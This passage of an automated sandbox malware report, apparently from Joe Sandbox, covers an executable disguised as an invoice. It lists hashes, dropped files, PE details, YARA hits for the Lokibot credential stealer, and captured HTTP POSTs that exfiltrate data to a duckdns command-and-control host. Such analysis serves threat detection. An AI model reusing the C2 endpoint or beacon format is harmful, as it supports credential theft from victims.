                                2ga2LylVIM.exeGet hashmaliciousBrowse
                                • 192.169.69.25
                                AFa8kUgrni.exeGet hashmaliciousBrowse
                                • 192.169.69.25
                                u8SFl9j1I8.exeGet hashmaliciousBrowse
                                • 45.14.115.62
                                66D9612BA9CDE67EDEA09F3482459F3BFE03FAAA13EAD.exeGet hashmaliciousBrowse
                                • 192.169.69.25

                                JA3 Fingerprints

                                No context

                                Dropped Files

                                No context

                                Created / dropped Files

                                C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Invoice and BL.exe.log
                                Process:C:\Users\user\Desktop\Invoice and BL.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1216
                                Entropy (8bit):5.355304211458859
                                Encrypted:false
                                SSDEEP:24:MLUE4K5E4Ks2E1qE4qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4x84j:MIHK5HKXE1qHiYHKhQnoPtHoxHhAHKzr
                                MD5:FED34146BF2F2FA59DCF8702FCC8232E
                                SHA1:B03BFEA175989D989850CF06FE5E7BBF56EAA00A
                                SHA-256:123BE4E3590609A008E85501243AF5BC53FA0C26C82A92881B8879524F8C0D5C
                                SHA-512:1CC89F2ED1DBD70628FA1DC41A32BA0BFA3E81EAE1A1CF3C5F6A48F2DA0BF1F21A5001B8A18B04043C5B8FE4FBE663068D86AA8C4BD8E17933F75687C3178FF6
                                Malicious:true
                                Reputation:high, very likely benign file
                                Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b219d4630d26b88041b59c21
                                C:\Users\user\AppData\Roaming\C79A3B\B52B3F.lck
                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                File Type:very short file (no magic)
                                Category:dropped
                                Size (bytes):1
                                Entropy (8bit):0.0
                                Encrypted:false
                                SSDEEP:3:U:U
                                MD5:C4CA4238A0B923820DCC509A6F75849B
                                SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                Malicious:false
                                Reputation:high, very likely benign file
                                Preview: 1
                                C:\Users\user\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-3853321935-2125563209-4053062332-1002\414045e2d09286d5db2581e0d955d358_d06ed635-68f6-4e9a-955c-4899f5f57b9a
                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):414
                                Entropy (8bit):0.6553179628425584
                                Encrypted:false
                                SSDEEP:3:/lbOllbOllbOllbOllbON:O
                                MD5:5D9D7B3222A4B52C61F455AFA027CAE4
                                SHA1:36BF394ABFBAF545FD187CE75BC76750CB0E3A08
                                SHA-256:7B86820B53F41B8F9DD41C3F6F564796DA458F672AEB7EBA03C422252846B551
                                SHA-512:27E36988F84BDFEE83F99FE2FCF1D98C3F6E4C3BFBC74958475B13243561016976D4F1998972B41C9D23CF5EE8307D84F0FE61711C140BD3D0E38E44A7403BFE
                                Malicious:false
                                Reputation:moderate, very likely benign file
                                Preview: ........................................user.......................................................................................user.......................................................................................user.......................................................................................user.......................................................................................user.

                                Static File Info

                                General

                                File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                Entropy (8bit):7.064655736923516
                                TrID:
                                • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                                • Win32 Executable (generic) a (10002005/4) 49.75%
                                • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                • Windows Screen Saver (13104/52) 0.07%
                                • Generic Win/DOS Executable (2004/3) 0.01%
                                File name:Invoice and BL.exe
                                File size:530432
                                MD5:3c7b342067f6142e6ed45551f5f60c50
                                SHA1:d83513aa4ac743b7fe0f7d1052a37b5ef1b50f60
                                SHA256:419865b95d9a00faea2d00122baabd7c2ea0be23dd5d3f15eae589bb5a6beecd
                                SHA512:33dcb9c1c0a5b7445c65baf93c2e84d2824a638e6a332b7f52c7a4b7b470e19bb75d28a47f43887ef85a1a593137e5e3805882e26607a4c00d9889760371aa8c
                                SSDEEP:6144:szFdMVnEVM6k02GhNvpG+5FPx2eW1REnHhJZdSFAx7cLM7QBUWQMZFGV1R5:KFdM5X02iNv4sjWTGmY7/DMZFUR5
                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......a..............0..............-... ...@....@.. ....................................@................................

                                File Icon

                                Icon Hash:00828e8e8686b000

                                Static PE Info

                                General

                                Entrypoint:0x482d82
                                Entrypoint Section:.text
                                Digitally signed:false
                                Imagebase:0x400000
                                Subsystem:windows gui
                                Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE
                                DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                                Time Stamp:0x6100F2E2 [Wed Jul 28 06:02:10 2021 UTC]
                                TLS Callbacks:
                                CLR (.Net) Version:v4.0.30319
                                OS Version Major:4
                                OS Version Minor:0
                                File Version Major:4
                                File Version Minor:0
                                Subsystem Version Major:4
                                Subsystem Version Minor:0
                                Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                Entrypoint Preview

                                Instruction
                                jmp dword ptr [00402000h]
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al

                                Data Directories

                                NameVirtual AddressVirtual Size Is in Section
                                IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                IMAGE_DIRECTORY_ENTRY_IMPORT0x82d300x4f.text
                                IMAGE_DIRECTORY_ENTRY_RESOURCE0x840000x5f0.rsrc
                                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                IMAGE_DIRECTORY_ENTRY_BASERELOC0x860000xc.reloc
                                IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                Sections

                                NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                .text0x20000x80d880x80e00False0.661054194956data7.07527531972IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                .rsrc0x840000x5f00x600False0.434244791667data4.23356085492IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                .reloc0x860000xc0x200False0.044921875data0.101910425663IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                Resources

                                NameRVASizeTypeLanguageCountry
                                RT_VERSION0x840900x360data
                                RT_MANIFEST0x844000x1eaXML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators

                                Imports

                                DLLImport
                                mscoree.dll_CorExeMain

                                Version Infos

                                DescriptionData
                                Translation0x0000 0x04b0
                                LegalCopyrightCopyright Thomas ICHE 2011
                                Assembly Version1.0.0.0
                                InternalNamesH7BDA6.exe
                                FileVersion1.0.0.0
                                CompanyNameThomas ICHE
                                LegalTrademarks
                                Comments
                                ProductNameNodeGraph Control
                                ProductVersion1.0.0.0
                                FileDescriptionNodeGraph Control
                                OriginalFilenamesH7BDA6.exe

                                Network Behavior

                                Network Port Distribution

                                TCP Packets

                                TimestampSource PortDest PortSource IPDest IP
                                Aug 3, 2021 23:25:48.240401983 CEST4973580192.168.2.3192.169.69.26
                                Aug 3, 2021 23:25:48.546915054 CEST8049735192.169.69.26192.168.2.3
                                Aug 3, 2021 23:25:48.547018051 CEST4973580192.168.2.3192.169.69.26
                                Aug 3, 2021 23:25:48.549781084 CEST4973580192.168.2.3192.169.69.26
                                Aug 3, 2021 23:25:48.989089012 CEST8049735192.169.69.26192.168.2.3
                                Aug 3, 2021 23:25:49.217688084 CEST4973680192.168.2.3192.169.69.26
                                Aug 3, 2021 23:25:49.590460062 CEST8049736192.169.69.26192.168.2.3
                                Aug 3, 2021 23:25:49.590812922 CEST4973680192.168.2.3192.169.69.26
                                Aug 3, 2021 23:25:49.594585896 CEST4973680192.168.2.3192.169.69.26
                                Aug 3, 2021 23:25:50.064380884 CEST8049736192.169.69.26192.168.2.3
                                Aug 3, 2021 23:25:50.286206007 CEST4973780192.168.2.3192.169.69.26
                                Aug 3, 2021 23:25:50.621546030 CEST8049737192.169.69.26192.168.2.3
                                Aug 3, 2021 23:25:50.621686935 CEST4973780192.168.2.3192.169.69.26
                                Aug 3, 2021 23:25:50.624500036 CEST4973780192.168.2.3192.169.69.26
                                Aug 3, 2021 23:25:51.116770983 CEST8049737192.169.69.26192.168.2.3

                                UDP Packets

                                TimestampSource PortDest PortSource IPDest IP
                                Aug 3, 2021 23:25:01.965200901 CEST5598453192.168.2.38.8.8.8
                                Aug 3, 2021 23:25:01.990057945 CEST53559848.8.8.8192.168.2.3
                                Aug 3, 2021 23:25:02.812500000 CEST6418553192.168.2.38.8.8.8
                                Aug 3, 2021 23:25:02.838824987 CEST53641858.8.8.8192.168.2.3
                                Aug 3, 2021 23:25:03.623450041 CEST6511053192.168.2.38.8.8.8
                                Aug 3, 2021 23:25:03.655958891 CEST53651108.8.8.8192.168.2.3
                                Aug 3, 2021 23:25:04.799285889 CEST5836153192.168.2.38.8.8.8
                                Aug 3, 2021 23:25:04.824037075 CEST53583618.8.8.8192.168.2.3
                                Aug 3, 2021 23:25:05.609446049 CEST6349253192.168.2.38.8.8.8
                                Aug 3, 2021 23:25:05.635703087 CEST53634928.8.8.8192.168.2.3
                                Aug 3, 2021 23:25:06.394115925 CEST6083153192.168.2.38.8.8.8
                                Aug 3, 2021 23:25:06.426983118 CEST53608318.8.8.8192.168.2.3
                                Aug 3, 2021 23:25:07.545547962 CEST6010053192.168.2.38.8.8.8
                                Aug 3, 2021 23:25:07.570559978 CEST53601008.8.8.8192.168.2.3
                                Aug 3, 2021 23:25:08.219691992 CEST5319553192.168.2.38.8.8.8
                                Aug 3, 2021 23:25:08.252476931 CEST53531958.8.8.8192.168.2.3
                                Aug 3, 2021 23:25:09.019900084 CEST5014153192.168.2.38.8.8.8
                                Aug 3, 2021 23:25:09.055320978 CEST53501418.8.8.8192.168.2.3
                                Aug 3, 2021 23:25:11.024949074 CEST5302353192.168.2.38.8.8.8
                                Aug 3, 2021 23:25:11.052884102 CEST53530238.8.8.8192.168.2.3
                                Aug 3, 2021 23:25:11.832559109 CEST4956353192.168.2.38.8.8.8
                                Aug 3, 2021 23:25:11.860027075 CEST53495638.8.8.8192.168.2.3
                                Aug 3, 2021 23:25:12.767927885 CEST5135253192.168.2.38.8.8.8
                                Aug 3, 2021 23:25:12.804932117 CEST53513528.8.8.8192.168.2.3
                                Aug 3, 2021 23:25:13.611267090 CEST5934953192.168.2.38.8.8.8
                                Aug 3, 2021 23:25:13.646742105 CEST53593498.8.8.8192.168.2.3
                                Aug 3, 2021 23:25:14.420315027 CEST5708453192.168.2.38.8.8.8
                                Aug 3, 2021 23:25:14.454694033 CEST53570848.8.8.8192.168.2.3
                                Aug 3, 2021 23:25:15.235562086 CEST5882353192.168.2.38.8.8.8
                                Aug 3, 2021 23:25:15.270891905 CEST53588238.8.8.8192.168.2.3
                                Aug 3, 2021 23:25:15.931452036 CEST5756853192.168.2.38.8.8.8
                                Aug 3, 2021 23:25:15.959507942 CEST53575688.8.8.8192.168.2.3
                                Aug 3, 2021 23:25:17.930167913 CEST5054053192.168.2.38.8.8.8
                                Aug 3, 2021 23:25:17.958234072 CEST53505408.8.8.8192.168.2.3
                                Aug 3, 2021 23:25:32.462038040 CEST5436653192.168.2.38.8.8.8
                                Aug 3, 2021 23:25:32.502648115 CEST53543668.8.8.8192.168.2.3
                                Aug 3, 2021 23:25:36.951637030 CEST5303453192.168.2.38.8.8.8
                                Aug 3, 2021 23:25:36.992911100 CEST53530348.8.8.8192.168.2.3
                                Aug 3, 2021 23:25:47.089174032 CEST5776253192.168.2.38.8.8.8
                                Aug 3, 2021 23:25:47.133114100 CEST53577628.8.8.8192.168.2.3
                                Aug 3, 2021 23:25:48.091098070 CEST5543553192.168.2.38.8.8.8
                                Aug 3, 2021 23:25:48.221827030 CEST53554358.8.8.8192.168.2.3
                                Aug 3, 2021 23:25:49.182408094 CEST5071353192.168.2.38.8.8.8
                                Aug 3, 2021 23:25:49.215876102 CEST53507138.8.8.8192.168.2.3
                                Aug 3, 2021 23:25:50.152689934 CEST5613253192.168.2.38.8.8.8
                                Aug 3, 2021 23:25:50.283862114 CEST53561328.8.8.8192.168.2.3
                                Aug 3, 2021 23:25:54.193939924 CEST5898753192.168.2.38.8.8.8
                                Aug 3, 2021 23:25:54.226804018 CEST53589878.8.8.8192.168.2.3
                                Aug 3, 2021 23:25:56.135874987 CEST5657953192.168.2.38.8.8.8
                                Aug 3, 2021 23:25:56.182151079 CEST53565798.8.8.8192.168.2.3
                                Aug 3, 2021 23:25:58.320705891 CEST6063353192.168.2.38.8.8.8
                                Aug 3, 2021 23:25:58.361673117 CEST53606338.8.8.8192.168.2.3
                                Aug 3, 2021 23:26:00.458633900 CEST6129253192.168.2.38.8.8.8
                                Aug 3, 2021 23:26:00.492656946 CEST53612928.8.8.8192.168.2.3
                                Aug 3, 2021 23:26:37.320955992 CEST6361953192.168.2.38.8.8.8
                                Aug 3, 2021 23:26:37.372351885 CEST53636198.8.8.8192.168.2.3
                                Aug 3, 2021 23:26:38.905750036 CEST6493853192.168.2.38.8.8.8
                                Aug 3, 2021 23:26:38.948692083 CEST53649388.8.8.8192.168.2.3

                                DNS Queries

                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                Aug 3, 2021 23:25:48.091098070 CEST192.168.2.38.8.8.80x848aStandard query (0)abixmaly.duckdns.orgA (IP address)IN (0x0001)
                                Aug 3, 2021 23:25:49.182408094 CEST192.168.2.38.8.8.80xa9e8Standard query (0)abixmaly.duckdns.orgA (IP address)IN (0x0001)
                                Aug 3, 2021 23:25:50.152689934 CEST192.168.2.38.8.8.80x7bffStandard query (0)abixmaly.duckdns.orgA (IP address)IN (0x0001)

                                DNS Answers

                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                Aug 3, 2021 23:25:48.221827030 CEST8.8.8.8192.168.2.30x848aNo error (0)abixmaly.duckdns.org192.169.69.26A (IP address)IN (0x0001)
                                Aug 3, 2021 23:25:49.215876102 CEST8.8.8.8192.168.2.30xa9e8No error (0)abixmaly.duckdns.org192.169.69.26A (IP address)IN (0x0001)
                                Aug 3, 2021 23:25:50.283862114 CEST8.8.8.8192.168.2.30x7bffNo error (0)abixmaly.duckdns.org192.169.69.26A (IP address)IN (0x0001)

                                HTTP Request Dependency Graph

                                • abixmaly.duckdns.org

                                HTTP Packets

                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                0192.168.2.349735192.169.69.2680C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                TimestampkBytes transferredDirectionData
                                Aug 3, 2021 23:25:48.549781084 CEST1329OUTPOST /binge/fre.php HTTP/1.0
                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                Host: abixmaly.duckdns.org
                                Accept: */*
                                Content-Type: application/octet-stream
                                Content-Encoding: binary
                                Content-Key: D82FEB54
                                Content-Length: 190
                                Connection: close


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                1192.168.2.349736192.169.69.2680C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                TimestampkBytes transferredDirectionData
                                Aug 3, 2021 23:25:49.594585896 CEST1336OUTPOST /binge/fre.php HTTP/1.0
                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                Host: abixmaly.duckdns.org
                                Accept: */*
                                Content-Type: application/octet-stream
                                Content-Encoding: binary
                                Content-Key: D82FEB54
                                Content-Length: 190
                                Connection: close


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                2192.168.2.349737192.169.69.2680C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                TimestampkBytes transferredDirectionData
                                Aug 3, 2021 23:25:50.624500036 CEST1337OUTPOST /binge/fre.php HTTP/1.0
                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                Host: abixmaly.duckdns.org
                                Accept: */*
                                Content-Type: application/octet-stream
                                Content-Encoding: binary
                                Content-Key: D82FEB54
                                Content-Length: 163
                                Connection: close


                                Code Manipulations

                                Statistics

                                CPU Usage

                                Click to jump to process

                                Memory Usage

                                Click to jump to process

                                High Level Behavior Distribution

                                Click to dive into process behavior distribution

                                Behavior

                                Click to jump to process

                                System Behavior

                                Analysis Process: Invoice and BL.exe PID: 1152 Parent PID: 5556

                                General

                                Start time:23:25:05
                                Start date:03/08/2021
                                Path:C:\Users\user\Desktop\Invoice and BL.exe
                                Wow64 process (32bit):true
                                Commandline:'C:\Users\user\Desktop\Invoice and BL.exe'
                                Imagebase:0x370000
                                File size:530432 bytes
                                MD5 hash:3C7B342067F6142E6ED45551F5F60C50
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:.Net C# or VB.NET
                                Yara matches:
                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.289975656.0000000003912000.00000004.00000001.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000000.00000002.289975656.0000000003912000.00000004.00000001.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000000.00000002.289975656.0000000003912000.00000004.00000001.sdmp, Author: Joe Security
                                • Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000000.00000002.289975656.0000000003912000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.289177832.00000000027F1000.00000004.00000001.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000000.00000002.289177832.00000000027F1000.00000004.00000001.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000000.00000002.289177832.00000000027F1000.00000004.00000001.sdmp, Author: Joe Security
                                • Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000000.00000002.289177832.00000000027F1000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                Reputation:low

                                Chronological Activities

                                Analysis Process: RegSvcs.exe PID: 5412 Parent PID: 1152

                                General

                                Start time:23:25:45
                                Start date:03/08/2021
                                Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                Wow64 process (32bit):true
                                Commandline:{path}
                                Imagebase:0x830000
                                File size:45152 bytes
                                MD5 hash:2867A3817C9245F7CF518524DFD18F28
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Yara matches:
                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000007.00000002.294466298.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000007.00000002.294466298.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000007.00000002.294466298.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                • Rule: Loki_1, Description: Loki Payload, Source: 00000007.00000002.294466298.0000000000400000.00000040.00000001.sdmp, Author: kevoreilly
                                • Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000007.00000002.294466298.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                Reputation:high

                                Chronological Activities

                                Disassembly

                                Code Analysis

                                Reset < >

                                  Analysis Process: Invoice and BL.exe PID: 1152 Parent PID: 5556 Invoice and BL.exeCOMMON

                                  Executed Functions

                                  Function 00BD7C23, Relevance: 4.0, Strings: 3, Instructions: 205COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.288894024.0000000000BD0000.00000040.00000001.sdmp, Offset: 00BD0000, based on PE: false
                                  Similarity
                                  • API ID:
                                  • String ID: UP,K$UP,K$obb+
                                  • API String ID: 0-842833724
                                  • Opcode ID: bdb9018cbd0c7722fc9067a30bc15c5d1a90493bf6dac1e8af05239314e1d88d
                                  • Instruction ID: 7902a617ef76425fb0b008be7eec628625efb5201176d6e9e9e2c1f2d482f4ec
                                  • Opcode Fuzzy Hash: bdb9018cbd0c7722fc9067a30bc15c5d1a90493bf6dac1e8af05239314e1d88d
                                  • Instruction Fuzzy Hash: 228115B0E59219DFCB04CFA5D4845EEFBF2EF49310F24A56AE00AAB354EB349941CB14
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00BD25B8, Relevance: 1.5, Strings: 1, Instructions: 240COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.288894024.0000000000BD0000.00000040.00000001.sdmp, Offset: 00BD0000, based on PE: false
                                  Similarity
                                  • API ID:
                                  • String ID: 61,a
                                  • API String ID: 0-3525954982
                                  • Opcode ID: e538333860f810da6c780b349079cd3d7f5c825c09f772240348b7d1f2b70928
                                  • Instruction ID: 8aec7e2a938514d75085fd0ba9602ef8cfe5acc78ae587bb6470bf0b45d31e04
                                  • Opcode Fuzzy Hash: e538333860f810da6c780b349079cd3d7f5c825c09f772240348b7d1f2b70928
                                  • Instruction Fuzzy Hash: ABA1F274E052498BCB08CFE9C5859DEFBF2BF98310F24C56AD409AB354E73499428F65
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00BD25B3, Relevance: 1.5, Strings: 1, Instructions: 231COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.288894024.0000000000BD0000.00000040.00000001.sdmp, Offset: 00BD0000, based on PE: false
                                  Similarity
                                  • API ID:
                                  • String ID: 61,a
                                  • API String ID: 0-3525954982
                                  • Opcode ID: 7b7561003de4e63a8a6990f63d081b49e29f72ba15087e46c596218d109aaf33
                                  • Instruction ID: cafdb98d1eed88c8df363eba2a96ff1453b101a720de519de09b7cc0e6f3f014
                                  • Opcode Fuzzy Hash: 7b7561003de4e63a8a6990f63d081b49e29f72ba15087e46c596218d109aaf33
                                  • Instruction Fuzzy Hash: 5AA1F374E012598BCB08CFE9C5855DEFBF2BF98310F24C56AD409AB354E73499428F65
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00BD0208, Relevance: 1.3, Strings: 1, Instructions: 96COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.288894024.0000000000BD0000.00000040.00000001.sdmp, Offset: 00BD0000, based on PE: false
                                  Similarity
                                  • API ID:
                                  • String ID: UlA
                                  • API String ID: 0-501016178
                                  • Opcode ID: 4d34324b8956eaee3c82d67685858472e9668cad48e7611d2540751d147eb330
                                  • Instruction ID: d188217ef46020c1ee91172254857f4407b9d400ef4a63cd28193688d880b486
                                  • Opcode Fuzzy Hash: 4d34324b8956eaee3c82d67685858472e9668cad48e7611d2540751d147eb330
                                  • Instruction Fuzzy Hash: 7541F974E116188FDB58DFAAD84079EFBF3EFC9300F14C0AAC509A6224EB704A858F51
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00BD1140, Relevance: .3, Instructions: 270COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.288894024.0000000000BD0000.00000040.00000001.sdmp, Offset: 00BD0000, based on PE: false
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: d381a851264b044d5d009817eff04f9e4db5e01e6d4fd4dc0331c5c69c747c92
                                  • Instruction ID: b4be2c4dd0e236740e7a6a6f6cdcbc740f3386f99df7c5d9d899a2c61dcdd87f
                                  • Opcode Fuzzy Hash: d381a851264b044d5d009817eff04f9e4db5e01e6d4fd4dc0331c5c69c747c92
                                  • Instruction Fuzzy Hash: A1C10670A21244EFC704EFA8E58999DFBF2FF48755B14C86AE005DB264EB34A942CF50
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00BD113C, Relevance: .3, Instructions: 264COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.288894024.0000000000BD0000.00000040.00000001.sdmp, Offset: 00BD0000, based on PE: false
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 1a7a162b48ddbffb5d8b2b6fc8c4035132e6851ba39905d284df9df70d6845d3
                                  • Instruction ID: cf7aebb6d16530b677c4495029e404a0f2f3c1be512f3b679a03660ebd542aaf
                                  • Opcode Fuzzy Hash: 1a7a162b48ddbffb5d8b2b6fc8c4035132e6851ba39905d284df9df70d6845d3
                                  • Instruction Fuzzy Hash: F2C1F770A21244EFC704DFA8E58999DFBF2FF48755B14C86AE005DB264EB349942CF50
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00BD11B9, Relevance: .3, Instructions: 257COMMON
                                  Download Yara Rule
                                  Memory Dump Source
